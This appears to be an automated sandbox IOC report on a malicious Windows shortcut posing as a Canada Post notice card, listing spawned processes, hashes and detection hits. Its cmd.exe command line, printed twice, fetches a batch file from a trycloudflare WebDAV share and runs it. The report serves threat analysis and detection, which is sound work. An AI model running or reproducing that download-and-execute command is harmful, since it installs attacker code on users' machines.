Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd"

Details

Is windows:	true
Is dropped:	false
PID:	7716
Target ID:	1
Parent PID:	3504
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd"
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	02:51:18
Date:	26/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff761c60000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7724
Target ID:	2
Parent PID:	7716
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	02:51:18
Date:	26/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff70f010000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
CanadaPostNoticeCard.download.lnk

Processes

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportCanadaPostNoticeCard.download.lnk

Processes

IOC Report
CanadaPostNoticeCard.download.lnk